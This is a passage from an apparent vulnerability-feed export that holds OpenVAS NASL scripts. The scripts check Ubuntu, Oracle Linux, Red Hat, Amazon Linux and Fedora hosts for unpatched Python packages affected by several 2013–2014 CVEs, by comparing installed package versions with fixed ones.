This issue only affected Ubuntu\n12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4616)\n\nIt was discovered that the Python CGIHTTPServer incorrectly handled\nURL-encoded path separators in URLs. A remote attacker could use this issue\nto expose sensitive information, or possibly execute arbitrary code. This\nissue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4650)\n\nIt was discovered that Python incorrectly handled sizes and offsets in\nbuffer functions. An attacker could possibly use this issue to read\narbitrary memory and obtain sensitive information. This issue only affected\nUbuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-7185)\");\n script_tag(name:\"affected\", value:\"python2.7 on Ubuntu 14.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2653-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2653-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS|12\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.8-10ubuntu1.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.8-10ubuntu1.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.4\", ver:\"3.4.2-1ubuntu0.1\", rls:\"UBUNTU14.10\")) != NULL)\n 
{\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.4-minimal\", ver:\"3.4.2-1ubuntu0.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.6-8ubuntu0.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.6-8ubuntu0.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.4\", ver:\"3.4.0-2ubuntu1.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.4-minimal\", ver:\"3.4.0-2ubuntu1.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.3-0ubuntu3.8\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.3-0ubuntu3.8\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.2\", ver:\"3.2.3-0ubuntu3.7\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.2-minimal\", ver:\"3.2.3-0ubuntu3.7\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-27T14:56:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "description": "Oracle Linux Local Security Checks ELSA-2015-2101", 
"modified": "2018-09-28T00:00:00", "published": "2015-11-24T00:00:00", "id": "OPENVAS:1361412562310122760", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122760", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-2101", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-2101.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122760\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-11-24 10:17:32 +0200 (Tue, 24 Nov 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-2101\");\n script_tag(name:\"insight\", value:\"ELSA-2015-2101 - python security, bug fix, and enhancement update. 
Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-2101\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-2101.html\");\n script_cve_id(\"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2013-1752\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-debug\", rpm:\"python-debug~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-devel\", rpm:\"python-devel~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-libs\", rpm:\"python-libs~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-test\", rpm:\"python-test~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = 
isrpmvuln(pkg:\"python-tools\", rpm:\"python-tools~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"tkinter\", rpm:\"tkinter~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-27T14:56:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650", "CVE-2014-9365"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2015-11-20T00:00:00", "id": "OPENVAS:1361412562310871501", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871501", "type": "openvas", "title": "RedHat Update for python RHSA-2015:2101-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for python RHSA-2015:2101-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871501\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-11-20 06:24:47 +0100 (Fri, 20 Nov 2015)\");\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\",\n \"CVE-2014-7185\", \"CVE-2014-9365\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for python RHSA-2015:2101-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Python is an interpreted, interactive,\nobject-oriented programming language often compared to Tcl, Perl, Scheme, or\nJava. Python includes modules, classes, exceptions, very high level dynamic\ndata types and dynamic typing. Python supports interfaces to many system calls\nand libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and\nMFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict the\nsize of gzip-compressed HTTP responses. A malicious XMLRPC server could\ncause an XMLRPC client using xmlrpclib to consume an excessive amount of\nmemory. 
(CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An attacker\nable to control the index value passed to one of the affected functions\ncould possibly use this flaw to disclose portions of the application\nmemory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or urllib)\ndid not perform verification of TLS/SSL certificates when connecting to\nHTTPS servers. A man-in-the-middle attacker could use this flaw to hijack\nconnections and eavesdrop or modify transferred data. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to enable\ncertificate verification by default. However, for backwards compatibility,\nverification remains disabled by default. Future updates may change this\ndefault. Refer to the Knowledgebase article 2039753 linked to in the\nReferences section for further details about this change. 
(BZ#1219108)\n\nThis update also fixes the following bugs:\n\n * Subprocesses used with the Eventlet library or regular threads previously\ntried to close epoll file descriptors twice, which led to an 'Invalid\nargument' error. Subprocesses h ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"python on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:2101-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-November/msg00019.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~34.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-debuginfo\", rpm:\"python-debuginfo~2.7.5~34.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-devel\", rpm:\"python-devel~2.7.5~34.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-libs\", rpm:\"python-libs~2.7.5~34.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2019-05-29T18:35:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-1912", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "description": "Oracle Linux Local Security Checks ELSA-2015-1064", "modified": "2019-03-14T00:00:00", "published": "2016-02-05T00:00:00", "id": "OPENVAS:1361412562310122870", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122870", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-1064", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1064.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122870\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-02-05 14:01:39 +0200 (Fri, 05 Feb 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1064\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1064\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1064.html\");\n script_cve_id(\"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2013-1752\", \"CVE-2014-1912\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(7|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"python27\", rpm:\"python27~1.1~20.el7\", rls:\"OracleLinux7\")) != NULL) {\n 
security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python\", rpm:\"python27-python~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-debug\", rpm:\"python27-python-debug~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-devel\", rpm:\"python27-python-devel~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-libs\", rpm:\"python27-python-libs~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-pip\", rpm:\"python27-python-pip~1.5.6~5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-setuptools\", rpm:\"python27-python-setuptools~0.9.8~5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-simplejson\", rpm:\"python27-python-simplejson~3.2.0~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-test\", rpm:\"python27-python-test~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-tools\", rpm:\"python27-python-tools~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-wheel\", rpm:\"python27-python-wheel~0.24.0~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-runtime\", rpm:\"python27-runtime~1.1~20.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = 
isrpmvuln(pkg:\"python27-scldevel\", rpm:\"python27-scldevel~1.1~20.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-tkinter\", rpm:\"python27-tkinter~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"python27\", rpm:\"python27~1.1~17.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python\", rpm:\"python27-python~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-debug\", rpm:\"python27-python-debug~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-devel\", rpm:\"python27-python-devel~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-libs\", rpm:\"python27-python-libs~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-pip\", rpm:\"python27-python-pip~1.5.6~5.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-setuptools\", rpm:\"python27-python-setuptools~0.9.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-simplejson\", rpm:\"python27-python-simplejson~3.2.0~2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-test\", rpm:\"python27-python-test~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-tools\", 
rpm:\"python27-python-tools~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-wheel\", rpm:\"python27-python-wheel~0.24.0~2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-runtime\", rpm:\"python27-runtime~1.1~17.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-scldevel\", rpm:\"python27-scldevel~1.1~17.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-tkinter\", rpm:\"python27-tkinter~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T23:01:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4616"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120575", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120575", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-374)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120575\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:29:53 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-374)\");\n script_tag(name:\"insight\", value:\"It was\");\n script_tag(name:\"solution\", value:\"Run yum update python-simplejson to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-374.html\");\n script_cve_id(\"CVE-2014-4616\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"python-simplejson-debuginfo\", rpm:\"python-simplejson-debuginfo~3.5.3~1.7.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n 
if(!isnull(res = isrpmvuln(pkg:\"python-simplejson\", rpm:\"python-simplejson~3.5.3~1.7.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:37:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4616"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-07-01T00:00:00", "id": "OPENVAS:1361412562310867929", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867929", "type": "openvas", "title": "Fedora Update for python FEDORA-2014-7800", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python FEDORA-2014-7800\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867929\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-01 15:22:41 +0530 (Tue, 01 Jul 2014)\");\n script_cve_id(\"CVE-2014-4616\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for python FEDORA-2014-7800\");\n script_tag(name:\"affected\", value:\"python on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-7800\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134903.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = 
